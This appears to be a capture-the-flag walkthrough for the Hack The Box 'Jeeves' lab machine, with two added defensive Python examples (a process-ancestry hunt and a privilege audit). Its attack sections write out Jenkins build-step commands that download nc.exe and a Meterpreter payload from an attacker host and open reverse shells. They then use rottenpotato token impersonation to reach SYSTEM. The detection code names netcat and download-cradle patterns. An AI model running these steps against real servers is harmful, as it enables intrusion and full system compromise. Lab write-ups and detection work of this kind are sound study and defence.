HTB – Jeeves Walkthrough

nmap

PORT      STATE SERVICE      VERSION
80/tcp    open  http         Microsoft IIS httpd 10.0
| http-methods:
|   Supported Methods: OPTIONS TRACE GET HEAD POST
|   Potentially risky methods: TRACE
|_http-server-header: Microsoft-IIS/10.0
|_http-title: Ask Jeeves
135/tcp   open  msrpc        Microsoft Windows RPC
445/tcp   open  microsoft-ds Microsoft Windows 7 - 10 microsoft-ds (workgroup: WORKGROUP)
50000/tcp open  http         Jetty 9.4.z-SNAPSHOT
|_http-server-header: Jetty(9.4.z-SNAPSHOT)
|_http-title: Error 404 Not Found
Service Info: Host: JEEVES; OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
| smb2-security-mode:
|   2.10:
|     Message signing enabled but not required
|_smb2-time: Protocol negotiation failed (SMB2)

gobuster

root@kali:/home/kalisa/HTB/jeeves# gobuster -u http://10.10.10.63:50000/ -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
=====================================================
Gobuster v2.0.1              OJ Reeves (@TheColonial)
=====================================================
[+] Mode         : dir
[+] Url/Domain   : http://10.10.10.63:50000/
[+] Threads      : 10
[+] Wordlist     : /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
[+] Status codes : 200,204,301,302,307,403
[+] Timeout      : 10s
=====================================================
2019/07/07 Starting gobuster
=====================================================
/askjeeves (Status: 302)
Progress: 117951 / 220561 (53.48%)

Jenkins 

Code Execution

Create a project on Jenkins

Screenshot: the Jenkins "Enter an item name" page at http://10.10.10.63:50000/askjeeves/view/all/newJob, item name "kalisa", type "Freestyle project" (Jenkins builds the project, combining any SCM with any build system), then OK.

Low Privileged Shell

Enter the following commands under the Build section, as an "Execute Windows batch command" step:

powershell wget "http://10.10.14.4:8000/nc.exe" -outfile "nc.exe"

nc.exe 10.10.14.4 7777 -e cmd.exe

Screenshot: Build step "Execute Windows batch command" with the command box containing
powershell wget "http://10.10.14.13:8000/nc.exe" -outfile "nc.exe"
nc.exe 10.10.14.13 7777 -e cmd.exe
followed by Save and Apply.

I served nc.exe with Python's SimpleHTTPServer and started an nc listener on port 7777 to catch the reverse shell.

root@kali:/home/kalisa/HTB/jeeves# python -m SimpleHTTPServer
Serving HTTP on 0.0.0.0 port 8000 ...
10.10.10.63 - - [07/Jul/2019] "GET /nc.exe HTTP/1.1" 200 -

root@kali:/home/kalisa/HTB/jeeves# nc -nlvp 7777
listening on [any] 7777 ...
connect to [10.10.14.13] from (UNKNOWN) [10.10.10.63] 49677
Microsoft Windows [Version 10.0.10586]
(c) 2015 Microsoft Corporation. All rights reserved.

C:\...\.jenkins\wo

Meterpreter Shell

Create a Meterpreter reverse shell payload with the following msfvenom command:

msfvenom -p windows/meterpreter/reverse_tcp LHOST= LPORT= -f exe > shell.exe

Upload the executable file as shell.exe

Screenshot: Build step "Execute Windows batch command" with the command box containing
powershell wget "http://10.10.14.13:8000/shell.exe" -outfile "shell.exe"
shell.exe
followed by Save and Apply.

Then start a Metasploit multi/handler listener:

root@kali:/home/kalisa/HTB/jeeves# msfconsole
       =[ metasploit v5.0.29-dev                          ]
+ -- --=[ 1899 exploits - 1068 auxiliary - 329 post       ]
+ -- --=[ 547 payloads - 44 encoders - 10 nops            ]
+ -- --=[ 2 evasion                                       ]

[*] Starting persistent handler(s)...
msf5 > use exploit/multi/handler
msf5 exploit(multi/handler) > set payload windows/meterpreter/reverse_tcp
payload => windows/meterpreter/reverse_tcp
msf5 exploit(multi/handler) > set LHOST 10.10.14.13
LHOST => 10.10.14.13
msf5 exploit(multi/handler) > set LPORT 8888
LPORT => 8888
msf5 exploit(multi/handler) > run

[*] Started reverse TCP handler on 10.10.14.13:8888
[*] Sending stage (179779 bytes) to 10.10.10.63
[*] Meterpreter session 1 opened (10.10.14.13:8888 -> 10.10.10.63:49679) at 2019-07-07 -0400

meterpreter >
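From the defender's side, the build steps in the Low Privileged Shell and Meterpreter Shell sections leave a distinctive trace: processes descended from the Jenkins java process that fetch a binary and hand out a shell. The following is an added example, not part of this walkthrough, that applies that logic to constructed process-creation records; the field names are Sysmon Event ID 1's, every PID, path and command line is made up to mirror the steps above, and the `jenkins.war` marker and the regexes are my assumptions.

```python
"""Hunt for Jenkins build steps that turn into download-and-execute shells.
Added example, not part of the original walkthrough. Events are constructed
records using Sysmon Event ID 1 field names; every value below is made up."""
import re

JENKINS_MARKERS = ("jenkins.war", "jenkins.exe")      # how the controller/agent shows up
SUSPICIOUS = [
    re.compile(r"\b(wget|curl|iwr|invoke-webrequest|downloadfile|downloadstring)\b", re.I),
    re.compile(r"\bnc(64)?\.exe\b.*\s-e\s", re.I),   # netcat handing out a shell, as above
    re.compile(r"\s-e\s+(cmd|powershell)(\.exe)?\b", re.I),
]

SAMPLE_EVENTS = [  # constructed: Jenkins on port 50000 running the build steps shown above
    {"ProcessId": 1200, "ParentProcessId": 800, "CommandLine": "java -jar jenkins.war --httpPort=50000"},
    {"ProcessId": 3400, "ParentProcessId": 1200, "CommandLine": r"cmd /c call C:\Users\jenkins\.jenkins\workspace\kalisa\build.bat"},
    {"ProcessId": 3410, "ParentProcessId": 3400, "CommandLine": 'powershell wget "http://10.10.14.13:8000/nc.exe" -outfile "nc.exe"'},
    {"ProcessId": 3420, "ParentProcessId": 3400, "CommandLine": "nc.exe 10.10.14.13 7777 -e cmd.exe"},
    {"ProcessId": 3500, "ParentProcessId": 3400, "CommandLine": "cmd /c msbuild MyProject.sln"},  # ordinary build step
    {"ProcessId": 4000, "ParentProcessId": 900, "CommandLine": "powershell Invoke-WebRequest https://example.invalid/t.zip -OutFile t.zip"},  # not under Jenkins
]

def jenkins_roots(events):
    """PIDs whose command line is the Jenkins controller or agent itself."""
    return {e["ProcessId"] for e in events
            if any(m in e["CommandLine"].lower() for m in JENKINS_MARKERS)}

def descends_from(pid, roots, parents, depth=8):
    """Walk ParentProcessId links upward; True if a Jenkins root is an ancestor."""
    while pid in parents and depth > 0:
        pid = parents[pid]
        if pid in roots:
            return True
        depth -= 1
    return False

def find_build_step_shells(events):
    """(pid, command line) for Jenkins-descended processes whose command line
    looks like a download cradle or a netcat shell; the build itself is not flagged."""
    parents = {e["ProcessId"]: e["ParentProcessId"] for e in events}
    roots = jenkins_roots(events)
    return [(e["ProcessId"], e["CommandLine"]) for e in events
            if e["ProcessId"] not in roots
            and descends_from(e["ProcessId"], roots, parents)
            and any(p.search(e["CommandLine"]) for p in SUSPICIOUS)]

if __name__ == "__main__":
    for pid, cmd in find_build_step_shells(SAMPLE_EVENTS):
        print(f"[ALERT] Jenkins build step spawned suspicious process {pid}: {cmd}")
```

Ancestry rather than direct parentage matters because Jenkins runs batch steps through an intermediate cmd.exe, so the download and the shell appear one level further down.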

Privilege Escalation

I checked with the whoami /priv command and saw that SeImpersonatePrivilege is enabled.

whoami /priv

PRIVILEGES INFORMATION
----------------------

Privilege Name                Description                               State
============================= ========================================= ========
SeShutdownPrivilege           Shut down the system                      Disabled
SeChangeNotifyPrivilege       Bypass traverse checking                  Enabled
SeUndockPrivilege             Remove computer from docking station      Disabled
SeImpersonatePrivilege        Impersonate a client after authentication Enabled
SeCreateGlobalPrivilege       Create global objects                     Enabled
SeIncreaseWorkingSetPrivilege Increase a process working set            Disabled
SeTimeZonePrivilege           Change the time zone                      Disabled
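The same table is what a defender should review for the account Jenkins runs as. Added example, not from the walkthrough: a small parser for `whoami /priv` output that reports which held privileges are the ones that make token impersonation possible; the HIGH_RISK set is my selection of real Windows privilege names, and SAMPLE_OUTPUT is re-typed from the listing above.

```python
"""Audit a `whoami /priv` listing for privileges that let a low-privileged
service account step up to SYSTEM. Added example, not from the walkthrough;
SAMPLE_OUTPUT is re-typed from the table above in whoami's own layout."""

# Real Windows privilege names that are effectively administrative when held by
# an account an attacker can run code as. SeImpersonatePrivilege is the one the
# Jenkins account on this box holds; the others are listed for completeness.
HIGH_RISK = {
    "SeImpersonatePrivilege", "SeAssignPrimaryTokenPrivilege", "SeDebugPrivilege",
    "SeBackupPrivilege", "SeRestorePrivilege", "SeTakeOwnershipPrivilege",
    "SeLoadDriverPrivilege", "SeTcbPrivilege", "SeCreateTokenPrivilege",
}

SAMPLE_OUTPUT = """\
PRIVILEGES INFORMATION
----------------------

Privilege Name                Description                               State
============================= ========================================= ========
SeShutdownPrivilege           Shut down the system                      Disabled
SeChangeNotifyPrivilege       Bypass traverse checking                  Enabled
SeUndockPrivilege             Remove computer from docking station      Disabled
SeImpersonatePrivilege        Impersonate a client after authentication Enabled
SeCreateGlobalPrivilege       Create global objects                     Enabled
SeIncreaseWorkingSetPrivilege Increase a process working set            Disabled
SeTimeZonePrivilege           Change the time zone                      Disabled
"""

def parse_whoami_priv(text):
    """Return {privilege: state}. Data rows start after the '=====' ruler; names
    and states never contain spaces, so each row splits as name ... state."""
    lines = text.splitlines()
    ruler = next(i for i, line in enumerate(lines) if line.startswith("="))
    privs = {}
    for row in lines[ruler + 1:]:
        parts = row.split()
        if len(parts) >= 2:
            privs[parts[0]] = parts[-1]
    return privs

def risky_held(privs):
    """High-risk privileges the token holds, with their state. A 'Disabled'
    entry is still held: the process can enable it itself, so it counts."""
    return {p: state for p, state in privs.items() if p in HIGH_RISK}

if __name__ == "__main__":
    found = risky_held(parse_whoami_priv(SAMPLE_OUTPUT))
    print("high-risk privileges held:", ", ".join(f"{p} ({s})" for p, s in found.items()) or "none")
```

Running this against the output of the account that owns the Jenkins service shows whether a build-step code execution would land on a token that can be escalated; the fix is to run Jenkins under an account that does not hold these privileges.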

I first loaded incognito in meterpreter with the command load incognito.

Run list_tokens -g and you'll see that no impersonation tokens are available.

Upload rottenpotato.exe (here as rot.exe) and execute it:

meterpreter > list_tokens -g
[-] Warning: Not currently running as SYSTEM, not all tokens will be available
             Call rev2self if primary process token is SYSTEM

Delegation Tokens Available
========================================
BUILTIN\Users
NT AUTHORITY\Authenticated Users
NT AUTHORITY\Local account
NT AUTHORITY\LogonSessionId_0_116102
NT AUTHORITY\NTLM Authentication
NT AUTHORITY\SERVICE
NT AUTHORITY\This Organization

Impersonation Tokens Available
========================================
No tokens available

meterpreter > execute -f rot.exe
Process 3536 created.
Channel 3 created.

Run list_tokens -g again and you'll now see the BUILTIN\Administrators impersonation token.

meterpreter > list_tokens -g
[-] Warning: Not currently running as SYSTEM, not all tokens will be available
             Call rev2self if primary process token is SYSTEM

Delegation Tokens Available
========================================
BUILTIN\Users
NT AUTHORITY\Authenticated Users
NT AUTHORITY\Local account
NT AUTHORITY\LogonSessionId_0_116102
NT AUTHORITY\NTLM Authentication
NT AUTHORITY\SERVICE
NT AUTHORITY\This Organization

Impersonation Tokens Available
========================================
BUILTIN\Administrators
NT AUTHORITY\LogonSessionId_0_82652
NT SERVICE\BITS
NT SERVICE\DsmSvc
NT SERVICE\iphlpsvc
NT SERVICE\LanmanServer
NT SERVICE\lfsvc
NT SERVICE\Schedule
NT SERVICE\SENS
NT SERVICE\ShellHWDetection
NT SERVICE\Winmgmt
NT SERVICE\wuauserv

Now impersonate the token to become NT AUTHORITY\SYSTEM:

meterpreter > impersonate_token "BUILTIN\Administrators"
[-] Warning: Not currently running as SYSTEM, not all tokens will be available
             Call rev2self if primary process token is SYSTEM
[-] No delegation token available
[+] Successfully impersonated user NT AUTHORITY\SYSTEM
meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM
meterpreter >
